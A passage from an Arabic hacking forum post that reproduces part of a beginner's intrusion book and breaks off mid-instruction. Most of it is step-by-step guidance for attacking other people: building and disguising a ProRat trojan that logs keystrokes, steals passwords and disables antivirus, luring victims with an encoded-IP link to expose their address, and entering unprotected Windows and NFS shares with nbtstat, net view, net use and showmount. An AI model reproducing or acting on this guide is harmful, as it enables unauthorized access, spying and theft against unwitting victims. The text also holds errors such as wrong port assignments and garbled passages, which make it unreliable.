اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

كتاب القرصنة تحت المجهر

كتاب القرصنة تحت المجهر


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 17

الموضوع: كتاب القرصنة تحت المجهر

  1. #1
    هكر مبتديء Array
    تاريخ التسجيل
    Nov 2009
    المشاركات
    20

    Momayz كتاب القرصنة تحت المجهر



    :D١
    ٢
    بسم الله الرحمن الرحيم
    الحمد لله رب العالمين والصلاة والسلام على خاتم المرسلين سيدنا محمد
    وعلى آله وصحبة أجمعين .
    أبدأ بأسم اللة الرحمن الرحيم وهي خير بداية
    لهذا الكتاب الذي اعتبره كتابَا هيكليَا وليس مظمونَا لما لهذا الموضوع من قيمة
    لاتحصر في مجلد كامل وليس في كتاب وكأنني أغرف غرفة شٍحيحة من
    بحر بٍأكملة يج أمواجة ويصعب على الظمآن الوصول إلية حتى يحكم
    عقلة ليروي عطشة ولا اريد الآطالة في مقدمتى هذه.
    فهذا الكتاب يشرح طرق وأدوات "الهاكرز " في الإختراق والدخول إلى الانظمة
    دون تصريح له .
    وبما ان طرق المخترقين مرتبطة بالحماية والأمن فهذا سيفيد الجميع في حماية مواقعهم
    وشبكام واجهزم من الإختراق ويشرح هذا الكتاب ٤٠ % من اسلوب المخترقين
    المحترفين حاليا .
    ٣
    اهداء
    اهداء لجميع المواقع المهتمه بعلم الحماية والإختراق
    والى منتدى سكيورتى فور عرب
    ومنتدى العاصفة
    ومنتدى نجم دوس
    ومنتدى إعصار
    ومنتدى العصابة
    وإلى جميع من شاركني في قيادة فريق هاكرز بلا حدود
    واهداء خاص الى أعز اصحابي
    M-١٦
    و
    sNiper_hEx
    و
    Super_Linux
    *******_help و
    وإلى جميع قرائي الاعزاء
    واتمنى ان يحوز على رضائكم هذا الكتاب المتواضع
    ٤
    فهرس المحتويات
    الغلاف...................................... ..................... ١
    المقدمة.................................... ....................... ٢
    اهداء........................................ .................... ٣
    الفهرس...................................... .................... ٤
    ماهو الاختراق وكيف يتم استغلاله................................ ٤
    مصطلحات مهمة لكل مبتدئ....... ............................ ١٠
    شرح برنامج البرورات .......................................... ١٤
    ٢١.................................... ip كيفية استخراج رقم ال
    أختراق الانظمة ................................................ ٢٦
    حماية جهازك من الإختراق.................................. ..... ٣٢
    الفصل الثاني ................................................. ٣٦
    اختراق الشبكات والتجسس عليها............................... ٣٦
    التلينت .................................................. ....... ٣٩
    أستغلال البروتوكولات في الاختراق .............................. ٤٢
    الدوس في نظام ويندوز اكس بي .................................. ٤٥
    الفصل الثالث ................................................. ٥٢
    / رياضيات الاف تي بي ............................................. ٥٢
    السنايفر.................................. ......................... ٥٧
    مسارات ملفات المستخدمين بجميع الانظمة ......................... ٧٢
    الادوات الاحترافية ................................................ ٧٤
    دليل المواقع .................................................. ...... ٨٦
    ٩٤/ النهاية .................................................. ........ ٨٨
    ٥
    ماهو الاختراق؟
    الاختراق هو التسلل الى الانظمة دون شعور الاخرين بالدخول دون
    تصريح له .
    وهذا بااختصار لمعنى الاختراق ولاتعتقد ان بعض طرق الاغبياء حاليا
    بالمواقع تسمى اختراق واقصد بطرق الاغبياء هي نشر اختراقه
    والاعلان عن دخوله لهذا النظام للجميع فهذا خطأ ولايعتبر اختراق
    من الاساس .
    فأذا اردت ان تخترق فلايشعر بك احد وقت اختراقك ويجب ان
    لايعلم بوجودك المسؤول بالنظام الا بعد خروجك اذا اردت ان تترك
    له رساله .
    استغلال اختراقك
    ماهو الاختراق وكيف يتم استغلاله
    ((١))
    ٦
    يجب ان تستغل اختراقك بشئ يفيدك وليس لاثبات انك تستطيع
    الدخول الى النظام فقط وتكتفى ذا الغرض
    سواء على الاجهزه الشخصيه او الشبكات او المواقع
    سأقوم بتغيير كلمة مواقع الى خوادم وهذا افضل
    كيف تستغل اختراقك لصالحك؟
    الجواب
    اولا انصح الجميع عدم استخدام برامج مجانيه في الاختراق
    ولاتقوم بااستخدام برامج مخصصه للاختراق في الاصل
    ويجب ان تستخدم ادوات اخرى في استخدامها لضدها واستغلالها
    كيف ؟
    مثل ادوات السكيورتى
    ان تقوم باستغلالها بالاختراق لتبين لك المنافذ المفتوحه
    وغيره net cat & nmap & superscan مثل اداة ال
    من هذه الادوات
    اما الطريقة الثانيه والمرتبطة بجميع خطواتك
    وهي استغلال البروتوكولات وجمع نقاط ضعفها للدخول عن طريقها
    وبروتوكول النت بيوس ..وغيره FTP مثل بروتوكول الاف تي بي
    ٧
    لاتعتقد انه مجال عادى كأي مجال آخر مثل الجرافيكس والملتميديا
    وغيره
    بما انك ستصبح خطير فأعلم انه مجال خطير وله سلبيات وإيجابيات
    ولكن سلبياته في بداية هذا المشوار كثيره
    وستواجه كثير من المصاعب في البداية اذا لم تكن لديك خبره مسبقه
    ذا اال بتاتّا .
    ولكن لاتيئس ويجب ان تضع هذه القاعده توقيعك في هذا المشوار.
    ١- كثره القراءة
    ٢- التركيز
    ٣- التطبيق المتكرر
    لامل القراءة في هذا اال حتى وأذ اعتقدت انك متمكن به .
    تعرف الى هذا اال قبل الدخول إليه
    ((٢))
    ٨
    يجب التركيز بكل نقطه تواجهك ومراجعة الكتب والمواضيع حول
    ماوصلت له
    كثره التطبيق هي التى ستقتل اليأس ولاتعتقد انك اذا نجحت في
    المرحلة الاولى ستنجح بجميع المراحل وايضا لاتعتقد انك اذا فشلت
    بمرحلة واحده ستفشل ذا اال ككل
    وهذه اهم النقاط التى يجب ان تتخذها قبل دخولك ذا اال
    ولاتعتقد اننى اعطى مجال الإختراق اكبر من حجمه فهذا هو
    الصحيح
    فلك مجال الجرافيكس
    فجميع مابه هو ان تجيد استخدام برامجه وهذا ليس تقصير في
    محترفين هذا اال ولكن انا أتكلم عن البداية
    اما مجال الملتميديا
    فلا يختلف عن مجال الجرافيكس ويجب ان تجيد التعامل مع برامجه مع
    كثره استخدامها وبعد ذالك تكون محترف
    اما مجال الاختراق
    فلك نطفة ماء من بحر
    يجب ان تتعلم البرمجة حتى تتعامل مع الاكواد والاكسبلويتات
    والسكريبتات
    ٩
    يجب ان تجيد استخدام الانظمة حتى تستطيع التعامل مع ماتواجهه
    من اختراق
    مثال: اذا كنت من مستخدمين نظام النوافذ ويندوز وقمت
    بأختراق شبكه خادمها نظام ليونكس فلن تستطيع التحكم به وانت
    لاتجيد استخدام ليونكس ويجب ان يكون لديك خبره مسبقه ذا
    النظام ومع باقي الانظمة .
    يجب ان تكون متصفح مستمر لجميع مواقع السكيورتى والتعرف
    على الاخبار الجديده حول الحمايه واخر الثغرات حتى تواكب ماهو
    جديد ولاتكون متأخر عن العالم بطرقك
    يجب ان تتعامل مع برامج الحماية وتعرف ماا وماهي طبيعة عملها
    وان تعرف اا ستكون عدوك اللدود ذا اال من الآن فصاعدَا
    وهذا شرح بسيط جدا اذ لم اقول اننى لم اوفيه حقه بالشرح الكامل
    ال الإختراق مجال الهندسه العكسيه مجال الاحتراف الاصيل اال
    الخطير اال اللذي لايعرف قانون او غيره
    اذ لم اقول ان قانونه هو ((قانون الهاكرز لايحمي مغفلين))
    اما من ناحية اخرى وهي استخدام برامج التجسس
    مثل الاوبتكس والبرورات مثلا فبما انك استخدم هذه البرامج
    اانيه فيجب ان تحذرها جيدا وانصح الجميع عدم استخدام برامج
    ١٠
    تجسس الا بعد مايتم التأكد من صحتها و ٧٠ % من برامج
    التجسس هي تتجسس على صاحبها قبل ارسالها للضحايا
    اما من ناحية اخرى وهي تحميل البرامج من الإنترنت او حتى من
    المحلات التجاريه
    فلاتظمن ماا ويجب ان تتأكد بنفسك
    ولاتقول لي اننى اظمن هذا العضو بالمنتدى وجميع مواضيعه ليس ا
    مايسمى بتجسس فهذا لايشمل العضو نفسه ويجب ان تعتبر
    الموقع او العضو او المحل التجاري لايعلم ماا من ملفات تجسس
    ويجب ان تفحص كل ماتواجه ولاتثق باحد ثقه عمياء حتى ولو
    كان أنا شخصيا
    ١١
    سنبدأ بشرح المصطلحات البدائيه لبعض برامج التجسس والإختراق فمازلنا
    في اول اجزاء الكتاب.
    هو عنوان بروتوكول الإنترنت ip
    خادم server
    عميل Client
    بورت = منفذ port
    سكان عمليه مسح وبحث scan
    ضغط compress
    إيقونه icon
    ضحيه victim
    إتصال conncet
    تحميل downloder
    مصطلحات مهمة لكل مبتدئ
    ((٣))
    ١٢
    هذا الجدول البسيط يوضح ماستواجهه في جميع برامج التجسس
    سنبدأ بالنقطة المهمه وهي عنوان بروتوكول الإنترنت
    Ip
    وهي اختصال الى
    Enternet protocol
    هذا هو عنوان بروتوكول الإنترنت الرقمي والذي يكون تسلسلي لكل
    جهاز يتصل بالإنترنت
    ولنضرب مثال بسيط
    ١٢٧,٠,٠,١
    هذا هو عنوان بروتوكول الإنترنت قبل الاتصال
    يتكون من اربع خانات بعد مايتم الإتصال بالإنترنت يتحول الرقم
    التسلسلي هذا الى ارقام عدة تتغير مع كل اتصال بالإنترنت
    مثال
    ٢١٢,١٦٦,٠,١
    ٢١٢ = غالبا مايحدد منطقتك وهو اول رقم في الخانه الاولى
    ١٦٦ = يحدد غالبا خدمة اتصالك مثلا دي اس ال او بطاقة ...
    ٠= لايهم ان يكون رقم صفر ولكن لضرب المثال فقط لاغير
    ١= لتحديد موقعك بالاتصال
    هذا الرقم التسلسلي يبدا من ١ وينتهى عند ٢٥٥ وبعد ذالك يرجع من ١
    ويبدا بقائمه ارقام تسلسليه جديده
    فائدة رقم الاي بي
    ١٣
    لن تستطيع اختراق أي نظام وانت لم تتمكن من اخراج رقم الاي بي له
    Port-
    يحتل المرتبه الثانيه بعد الاي بي عند كافه الهاكرز والمخترقين
    وهو مايسهل عليك الدخول للجهاز بعد معرفتك للمنفذ المفتوح بالجهاز
    المستهدف .
    Server
    خادم غالبا ماتواجه هذه الكلمة في برامج التجسس وهي تعنى صنع الباتش
    والذي هو ملف التجسس لكي تستطيع التعديل والتحرير به قبل ارساله
    للضحيه
    والخادم ليس فقط لبرامج التجسس
    فأذا كنت بمجال اختراق البريد والاجهزه ستستخدم هذه الكلمه وكأا ملف
    تجسس
    اما في مجال الشبكات والمواقع فالخادم هو الجهاز الرئيسي الذي يحمل جميع
    ملفات الشبكه او جميع ملفات المواقع وكثير ماتشاهدها بالمواقع بأسم
    شركات الاستضافه فهي الخادم
    وله معاني كثيره ولكن اختصرت لك مايفيدك بمجال الاختراق في البداية
    ١٤
    العميل
    هو مايكون المنفذ الأساسي للخادم بامجال برامج التجسس ويكون هو
    الواجهه لتنفيذ الاوامر التى سترسل للخادم والذي هو بجهاز الضحيه مثلا
    ويتم تنفيذها
    ١٥
    يعتبر برنامج البرورات هو الاشهر والافضل حاليا بعالم التجسس
    وسأقوم بأعطائه ٩٠ نقطه من بين بقية برامج الباكدور الاخرى
    بعد مرور اربع سنوات على امبراطورية برنامج السب سفن من بين البرامج الاخرى
    ظهر برنامج البرورات وكان بعالمه هو الجديد من نوعه والفريد يمتاز هذا البرنامج
    بقوته ويستخدم للشبكات والى الاجهزه الشخصيه الاخرى بفعاليه قويه جدا
    ويتميز بسهولة صنع باتشه بسوله واليكم الشرح بالصور على هذا البرنامج الرائع
    Prorat شرح برنامج ال١٦
    هنا تضع رقم الاي بي
    هنا البورت ولاكن لاتقم بتغييره
    هنا للإتصال بعد مايتم وضع الاي بي الصحيح
    لتغيير الوان البرنامج
    لتنظيف الجهاز من الباتش اذا كان جهازك مصاب به
    ١٧
    المعلومات حول جهاز الضحيه PC lnfo
    البرامج الموجوده بجهاز الضحيه Applications
    ارسل للضحيه رسائل اخطاء Message
    مدير النوافذ Windows
    دردشة مع الضحيه chat
    مدير بروتوكول الاف تي بي Admin FTP
    اللعب بجهاز الضحيه Funny stuff
    مدير الملفات File Manager
    متصفح الانترنت IExplorer
    البحث عن ملفات بالجهاز Search Files
    لوحة التحكم الخاصه بجهاز الضحيه Control Panel
    الرجستري محرر التسجيل Registry
    إيقاف تشغيل جهاز الضحيه Shut Down PC
    تصوير سطح المكتب لجهاز الضحيه Screen Shot
    الكليب بورد Clipboard
    كي لوقر جاسوس لوحة لمفاتيح KeyLogger
    ١٨
    يئة الاقراص وعمل فورمات  Give Damage
    كلمات المرور الخاصه بالضحيه Passwords
    لتحميل والتشغيل بجهاز الضحيه R. Downloder
    تشغيل Run
    الطابعة وفائدها لطباعة بجهاز الضحيه اذا Printer
    كانت تعمل ..........
    الخدمات servecs
    أعداد الخادم Online Editor
    ProConncetive
    صنع الخادم وهنا توجد اعدادات الباتش Create
    اللغة English
    الخيار الاول لصنع سيرفر
    الخيار الثاني لصنع سيرفر تحميل
    الخيار الثالث لصنع سي جي أي بقائمه الضحايا
    - - - - - - - - - - - -
    لنفرض إننا قمنا بالضغط على اول خيار وهو لصنع سيرفر
    سيظهر لك قائمه ذا الكثير من الخانات وإليك الشرح بالصور
    ١٩
    هذا كنت في شبكه محليه وتريد ان يتم ارسال التبليغ عبر رقم الاي بي لجهازك فضع
    اشاره صح وقم بوضع رقم أي بي الشبكه . واذا كنت تستخدم جهاز مستقل
    فلاداعى لوضع اشاره واترك هذه الخانه وتابع معى بقيه شرح الخانات
    هذا الخانه لتنبيه عبر البريد قم بوضع اشاره صح وضع عنوان بريدك الإلكتروني
    الذي تريد ان يصلك معلومات حول جهاز الضحيه عن طريقه وهذا مهم جدا لمن
    اراد استخراج عنوان الاي بي عن طريق البرنامج
    هذا لتنبيه عبر الآسكيو ولكن لام هذه النقطه اذا قمت بوضع اشاره صح على
    خانه التبليغ عبر البريد .
    اذا قمت بوضع اشاره صح فستضطر لوضع تنبيه عبر السي جي آي ضع في خانه
    اللينك رابط موقعك وافضل ان تستخدم لوق السي جي آي لاستخراج الاي بي
    بعد التبليغ
    - - - - - - - - - -
    هنا منفذ السيرفر
    كلمه المرور للسيرفر
    اسم الضحيه
    هنا لظهور رسالة خطا عند تشغيل
    لكتابة الرسالة Configure الخادم قم بالضغط على
    هذا الخيار لحذف السيرفر من جهاز الضحيه بعد تشغيله
    ٢٠
    هذا الخيار لإغلاق برامج مكافحة الفايروسات والجدار الناري
    لإغلاق مركز الحمايه بويندوز اكس بي سيرفس
    باك تو
    أغلاق الجدار الناري لويندوز اكس بي
    إلغاء نقاط الاستعادة لويندوز اكس بي
    - -- -- -- -- --
    ضع اشاره صح واختر الملف الذي تريد ان يندمج معه
    الباتش
    - -- -- - -- -- --
    هنا لتغيير امتداد الباتش اما الخيارين التى باللون الاحمر هي بأيقونه اما بقيه الخيارات
    فستكون بدون ايقونه
    - -- -- -- -- --
    ٢١
    لإختيار إيقونه للباتش
    <-- - لصنع الباتش .......
    وتم بحمد لله الانتهاء من شرح البرنامج بالتفصيل
    وهذا هو موقع البرنامج الرئيسي
    ProRat.Net Software [index]
    ٢٢
    البرامج التى يجب تتوفر بجهازك العزيز
    ١- جدار ناري ؟؟؟
    Urlencode -٢
    ☺ ويكفي هذا
    الجدار الناري الذي هو فايروول بمكانك استخدام البي سي كلين او
    الزون الارام
    اما الوريلنكود فهذا هو رابطه
    http://www.geocities.com/naomy_cambel
    /urlencode.zip
    والان تابع معى بكل وضوح رجاء
    الان اسحب رقم الاي بي تبع جهازك انت وليس جهاز الضحية
    وطريقة اظهار رقم الاي بي تبع جهازك
    هو عن طريق الدوس
    ادخل الى نافذه الدوس
    واكتب ايبيكونفق
    ipconfig
    بعد مايظهر لك رقم الاي بي تبعك انسخه
    واذهب الى برنامج الوريلنكود كما موضح بالصورة
    للضحيه ip كيفية استخراج رقم ال٢٣
    ١- في الخيار الاول ضع الاي بي تبعك
    ٣- اضغط على انكود
    ٢- انظر لقد شفر لنا رقم الاي بي تبعنا
    بعد ماقمنا بتشفير رقم الاي بي تبع جهازنا سنضعه بعد
    /http://١٢٧,٠,٠,١
    وبأمكانك حتى دمجه مع أي موقع اذا اردت ولكن هذه طريقة فعاله
    %١٠٠
    اما لمن اراد دمجه مع موقع يكتبه هكذا
    هذا هو رقم الاي بي مشفر
    E٪٣٠٪٢E٪٣٠٪٢E٪٣١٢%٣٧%٣٢%٣١%
    وسندمجه مع موقع مايكروسوفت مثلا
    ٢٤
    ٢%٣٧%٣٢%٣١%http://google//
    E٪٣٠٪٢E٪٣٠٪٢E٪٣١
    والآن قدمة لضحية على طبق من ذهب
    بعد مايضغط الضحية على الينك والذي هو الرابط الموجود سيتوجه الى
    عنوان الاي بي تبعك وسيعطيه صفحه غير صالحة
    الان سيبدا مفعول الجدار الناري الفايروول
    بعد مايضغط الضحيه على الاي بي تبع جهازك سيطلق صافرات انذار
    برنامج الفايروول ويقول لك جهااز يريد الاتصال بك هل تسمح له
    بالدخول كالعادة
    ☺ وسيظهر رقم جهازه لك
    الان انسخ رقم جهازه والذي هو الاي بي من برنامج الجدار الناري
    ونقول لك بالهناء والشفاء حصلت على عنوان جهازه بكل سهوله
    وبدون ان يشك وبدون حتى ان تسبب لنفسك عوائق خوفا لللاي بي
    تبع جهازك فهو مشفر حتى لو كان الضحية مخترق لايستطيع فك تشفير
    رقم جهازك حتى يدخل عليه
    ٢٥
    ** الطريقة الثانية**
    هذه الطريقة قديمة ومشهوره ولكن حبيت اننى اقوم بأضافتها بكتابي هذا
    حتى يكون الموضوع كامل والكامل وجه سبحانه تعالى
    اذا كان الضحية في شاتينق((دردشة)) او بماسنجر((رسول)) او بمكان
    يسمح لك ارسال واستقبال الملفات للاصدقاء
    فااتبع معى هذه الطريقة ولكن قبل ان ابدا بالشرح سأوضح لك شئ
    مهم
    من عادة سوبر كريستال ان يضع شرح كامل بدون استفسارات واسأله
    حول مواضيعه واول سؤال وجوابه معه
    هو هل انت بشبكة؟
    نعم
    لا
    اذا كنت بشبكة فسأقول لك الطريقة لن تفلح معك
    اما اذا كنت بجهازك
    فتابع معى الدرس بكل وضوح
    ارسل للضحية ملف او محادثة صوتيه..... الخ
    بعد ذالك توجه لدوس بسرعة واكتب نت ستات
    ٢٦
    netstat
    سيستخرج لك الدوس عناوين بروتوكولات كثيره
    الصورة تشرح لك هنا
    Address Local-١
    هنا ارقام الاي بي تبع جهازك وبرامجك
    Address Foreign-٢
    هنا ارقام الاي بي المواقع والبرامج التى زرا او حملتها ومنها رقم الاي بي
    تبع الضحيه وسيكون آخر رقم
    ٢٧
    ساشرح كيفية اختراق
    نظام النوافذ ويندوز
    ونظام المصدر المفتوح لينوكس
    نبدا على بركة للة
    سنركز على نقاط ضعف البروتوكولات وليس نقاط ضعف
    البورتات
    فنقطة الضعف تبدأ من الخدمة وليس من منفذ الخدمة
    هذا اقرب تعبير لها
    إختراق الانظمة بدون برامج
    ٢٨
    البروتوكولات التى سنتكلم عنها بسلسلة دروسنا هي كالتالي
    -- - - - -- - - - -- - - - -=NetBios= -- - - - -- - - - - - - -
    -
    هذا البروتوكول يسمح بالمشاركة بالملفات بنظام ويندوز النوافذ
    و ال (( TCPIP)) ويستخدم بروتكول التي سي بي إي بي
    ((NetBEUI))
    اما البورتات التى يستخدمها هي ،
    ١٣٧،١٣٨،١٣٩
    الآن قم بعمل((سكان)) مسح لهذه البورتات
    سيظهر لك كم هائل جدا من عناوين بروتوكولات الانترنت ((الاي
    بي)) للاجهزه التى مفتوح ا هذه البورتات
    اختر احد هذا الاجهزه وقم بالتطبيق عليه
    قم بكتابة هذا الامر في نافذة الدوس
    nbtstat -A
    ويكتب هكذا
    ٢٩
    nbtstat –A١٢٧,٠,٠,١
    ١٢٧,٠,٠,١ =عنوان الاي بي المستهدف
    طبعا سيظهر لك لسته كامله
    فلقد وقع ((SHARING)) اذا كان الجهاز المستهدف وضعه هو
    في قبضت يدك وهي تعنى انه يسمح بالمشاركة ...
    NOT )) اما اذا كان مفتح شوبه وفاهم الى يدور بيكون وضعه هو
    وهذا مغلق المشاركه ولن تستطيع الدخول على ((SHARING
    نظامة ياعزيزي
    الان قم بكتابة هذا الامر بدوس مع مراعاة عنوان الاي بي تبع
    الجهاز المستهدف
    net view \\127.0.0.1
    والآن اذا كان الضحية لم يضع كلمة مرور فسيسهل علينا
    تشريف نظامه والدخول عليه بدون أذنه
    وللدخول الى جهازه
    كما تعلمنا سابقا في اختراق الشبكات والدخول الى الاجهزه
    اذهب الى ابدأ (ستارت)) وبعد ذالك تشغيل
    ٣٠
    وضع الاي بي هكذا
    \\١٢٧,٠,٠,١
    ستظهر لك ملفات الضحية
    ويوجد طريقة اخرى عن طريق الدوس تسمح بالدخول الى قرص
    معين
    مثلا نريد الدخول الى قرص السي نكتب الامر هكذا
    net use c: \١٢٧,٠,٠,١C
    واذا اردنا الدخول الى قرص الدي نكتب هكذا
    net use d: \١٢٧,٠,٠,١D
    و قرص الاي
    net use e: \١٢٧,٠,٠,١E
    ☺ ونفس الطريقة مع بقية الاقراص
    ٣١
    وهكذا استغلينا بروتوكول النت بيوس للدخول للانظمة
    في نظام لينوكس
    توجد خدمة مشاركة الملفات وقريبة من النت بيوس واحببت ان
    اذكر بدايتها هنا
    Network System وهي اختصار الى NFS خدمة ال
    File
    هذا الخدمه تستخدم بروتوكول التى سي بي وتسمح بمشارك الملفات
    بنظام ليونكس
    وللاختراق عن طريقها
    ****l ادخل الى الترمينل
    وبعد ذالك قم بكتابة
    الامر:
    showmount -e127.0.0.1
    سيستخرج لك جميع الملفات المسموح ا المشاركه
    ٣٢
    طبعا هذا اذ لم يكن النظام المستهدف
    مفعل تصريح الوضع هكذا
    Read-only
    فهذا يعنى اننا لانستطيع الدخول الى النظام
    اما اذا كان
    التصريح هو
    Write
    فهذا يعنى انك تستطيع الدخول الى النظام
    ٣٣
    لايوجد شئ اسمه حمايه ١٠٠ % ولا حتى بنسبة ٩٠ % ولاتعتمد على
    برامج الحمايه في حماية جهازك
    فالحمايه تقف عند تصفحك للانترنت بالشكل الصحيح
    وانصحك عن الابتعاد عن تحميل البرامج اانيه من الإنترنت فأغلبها به
    فايروسات وملفات تجسس وحتى وان لم يكن يخص هذا اال .
    واذا كنت ممن لايستخدم الجهاز الا بوجود برامج حمايه فاانصحك بالابتعاد
    عن برامج الحمايه المشهوره مثل المكافي والانتى فايرس فهي غبيه جدا
    استخدم البرامج الغير مشهوره وانصح بالبرامج الروسيه بالمرتبه الاولى
    حماية جهازك من الإختراق
    ٣٤
    حمل برامج السبايوير مثل برنامج
    BPS Spyware & Adware Remover
    وهذه صورة للبرنامج وانا بنفسي استخدمه
    فهذه خلفيه ليس ☺ لاتعتقد ان صورة برتنى سبيرز في نفس البرنامج
    للبرنامج علاقه ا
    والطريقة الثانيه لاكمال حمايه جهازك بالشكل الصحيح
    ٣٥
    DeepFreeze استخدم برنامج ال
    اعلم انه برنامج مزعج بعض الوقت للإجهزه الشخصيه
    ولكن فائده فقط في شئ واحد
    وهو اذا قمت بتصفح موقع او تحميل برنامج به ملف تجسس ولصق بجهازك
    فبمجرد عمل اعادة تشغيل للجهاز سيتم حذفه لان وظيفه هذا البرنامج
    حذف جميع مايضاف للجهاز بعد مايتم تثبيت البرنامج
    وانصحك اذا اردت تحميله ان تحذف ملفات الكويكز وتثبت ماتريد من
    ☺ برامج قبل تثبيته فبعد التثبيت لن تستطيع تثبيت أي ملف بالجهاز
    وهذا هو حمايه جهازك جزء بسيط جدا وسأبتعد عن الطرق القديمه واغلاق
    البورتات ........الخ من طرق لاتفيدك ابدا وهذا اسهل وافضل الطرق
    لحماية جهازك
    ٣٦
    الفصل الثاني
    ٢
    ٣٧
    اعترف لك ان مجال الشبكات والخوادم ليس بالسهل وكما اختراق الاجهزه
    وغيره
    ليس اختراق الشبكات والخوادم هو انك تخترق احد الاجهزه وتكتفى ذا
    الغرض .....لاوالف لا
    يجب ان تخترق الجهاز الرئيسي وتتعامل معه بكل حذر حتى تستطيع ان تسيطر
    على جميع الاجهزه
    وتختلف شبكه عن شبكه وخادم عن خادم ليس بقوه حمايتها ولكن
    بالشخص الذي قام بربط الشبكه فمهندس الشبكات المحترف اعتقد انه
    سيربط الشبكه بأحكام واقفال كل ماتذكره سابقا من طرق اختراق ويجب
    ان تتعامل مع الشبكه بكل احتراف وكل تركيز
    اما المهندس الغبي سيسهل عليك الإختراق واغبي شئ لاحظته انا بنفسي ان
    ٦٠ % من المقاهى تسمح بالمشاركه؟؟؟؟؟
    وهذا قمه غباء طبعا واسهل عمليه تقوم بالسيطره على الخادم الرئيسي
    هذا الجزء سيكون مرتبط بالاجزاء التاليه
    لنفرض مثلا انك موجود بنفس الشبكة التى تريد ان تخترقها
    اختراق الشبكات والتجسس عليها
    ٣٨
    فما هي اول طريقة تفعلها ؟
    قم بالذهاب الى موجة الاوامر دوس
    وقم بكتابة هذا الامر
    Ipconfig
    سيستخرج لك هذا الامر قائمه بارقام بروتوكولات الشبكه ومنها
    البروتوكول الاساسي لنفس الشبكة
    ضعه بالنوتباد((المفكره)) واكمل معى الموضوع
    الان اكتب امر
    Net view
    في نفس موجة الاوامر لنتعرف على اسماء الاجهزه
    ** ملاحظة مهمة انا اتكلم عن شبكات ا سيرفر رئيسي فأذا كنت
    تستخدم شبكات اقل من الدرجه المتوسطه والتى اجهزا مرتبطه بدون
    خادم فلن يظهر لك اسماء للاجهزه **
    بعد ماقمت بكتابة الامر سيظهر لك جميع اسماء الاجهزه بالترتيب
    وعادة مايكون الاسم الاول هو للجهاز الرئيسي
    اختر احد هذه الاجهزة
    واحفظ اسمها وليكون الاسم الذي ظهر لك من بين الاجهزه هو
    ٣٩
    CRystaL
    اذهب لاابدا ومن ثم تشغيل واكتب الاسم هكذا
    \\CRystaL
    الان ادخل وسترى ملفات الجهاز بين يديك هذا اذا كان يسمح بالمشاركه
    وبأمكانك ايضَا تصفح الجهاز عن طريق الدوس ولكن اخترت لك الشاشه
    الرسوميه للابتعاد عن الاوامر وعدم الفهم .....
    واذا كان الجهاز يحمل كلمة مرور او حتى لايسمح بالمشاركة؟
    في هذه اللحظه اكمل معى بقيه الدروس والتوسع بالاختراق الحقيقي حتى
    تستفيد
    ولكن سأوضح شئ مهم
    اننى سأقوم بتطبيق بيقه الدروس على ويب سيرفر حتى تستفيد من جميع
    النواحي سواء اختراق شبكة او خادم مواق
    ٤٠
    التلينت في الإختراق
    التلينت برنامج صغير عظيم لعمل شيء ين مثيرين.
    في الحقيقة اذا اردت دعوة نفسك مخترق انت بالتأكيد يجب ان تكون قادرَا
    على استخدام التلينت
    سيكون مسار التلينت هو me، اذا كنت تستخدم مشتقات ويندوز ٩٥،٩٨
    c:\windows directory
    سيكون مسار التلينت XP،٢٠٠٠، NT اما مشتقات ال
    c:\winnt\system32 directory
    ليس في الانترنت مساعدة لهذا البرنامج فأحببت اننى ازود بعض المعلومات
    للمستخدمين الجدد
    وأعتبر التلينت ايضَا اهم نقطه بسلسلتنا هذه فهو البوابة الرئيسية لك
    بجميع المراحل وسأذكر البروتوكولات ومنافذها كي تستطيع الاتصال ا
    عن طريق التلينت
    TELNET التلينت
    ٤١
    ..........الخدمة............ ...........منفذها........
    ٢١ FTP
    ٢٣ SSH
    ٢٥ SMTP
    ٨٠ http
    ١١٠ Pop٣
    ٢٢ telnet
    ٤٤٣ https
    ٧٩ finger
    .......port........ ........servcs......
    بأمكانك ايضَا استرجاع صفحات الويب عن طريق التلينت وهي بخدمه
    . الاتش تي تي بي والتى عادة يكون منفذها هو ٨٠
    يوجد ايضاء خوادم ويب تستخدم منفذ ٨٠٨٠ ولكن الاغلبية والشائعة بين
    مواقع الإنترنت هو خادمات الويب التى تستخدم منفذ ٨٠
    اما للدخول الى موجة التلينت
    اذهب إلى
    start - -- - - - -> ابدا
    run- - -- - --> تشغيل
    قم بكتابة تلينت في مربع الحوار
    telnet
    ٤٢
    ستفتح لك موجة التلينت وستكون هكذا
    c:\>telnet <host> <port>
    اسم الجهاز او الموقع او الخادم المستهدف =host
    المنفذ المفتوح =port
    telnet
    c:\telnet>open
    c:\telnet>to ١٢٧,٠,٠,١
    o ب open اذا كنت من مستخدمين ويندوز اكس بي استبدل
    to بعد ذالك تكتب رقم الاي بي والبورت المفتوح بعد
    واضغط انتر للاتصال بالجهاز
    تأكد انه لن يقوم بالاتصال بالجهاز الاخرى في حالة عدم توافق البورت او
    حتى ان البورت مغلق
    افضل في هذه الحالة انك تستخدم برنامج السوبر سكان حتى تحصل على
    البورت المفتوح لينجح معك الاختراق او تقوم بكتابة البورتات المشهوره
    ☺ هذه الايام بسبب الفايروسات
    ٤٣
    كما تكلمت قبل ان جميع دروس كتابي مرتبطه ببعضها البعض
    فهذا الجزء مرتبط بدرس اختراق الانظمة........
    شرح تفصيلي مباشر لبروتوكول النت بيوس
    تكلمنا في جزء اختراق الانظمة عن كيفية الاختراق عن طريق بروتوكول
    النت بيوس
    ولكن لم نذكر اوامر النت بيوس او حتى مابعد الاختراق
    ولحرصي على الاستفادة بشكل واسع كي لاتقع بمشاكل لقله خبرتك ذا
    اال سأقوم بالشرح التصويري المباشر عن مابعد الاختراق باستغلال
    بروتوكول النت بيوس
    استغلال البروتوكولات في الاختراق
    ٤٤
    بأمكانك بعد الاتصال بالجهاز الاخر عن طريق النت بيوس ان تشترك بالطابعة
    والحافظات ايضا
    Net use x \\١٢٧,٠,٠,١\crystal
    رسالة الدافع x حيث ان
    و ١٢٧,٠,٠,١ رقم الاي بي للجهاز المستهدف
    الحافظة crystal و
    فإذا اردت ان تفتح الحافظة
    نكتب الامر التالي
    Net use i \\١٢٧,٠,٠,١\crystal
    واذا تلقيت رسالة اعلام فانت استطعت الدخول الى هذه الحافظة
    ولكن ماذا اذا كانت بكلمة مرور ؟؟
    في هذه الحالة سنقوم باستغلال السوبريوزر في نظام الويندوز
    ☺ كم هو مفضل لدي من روت بليونكس
    ٤٥
    قم بطباعة هذا الامر لتخطى كلمة المرور
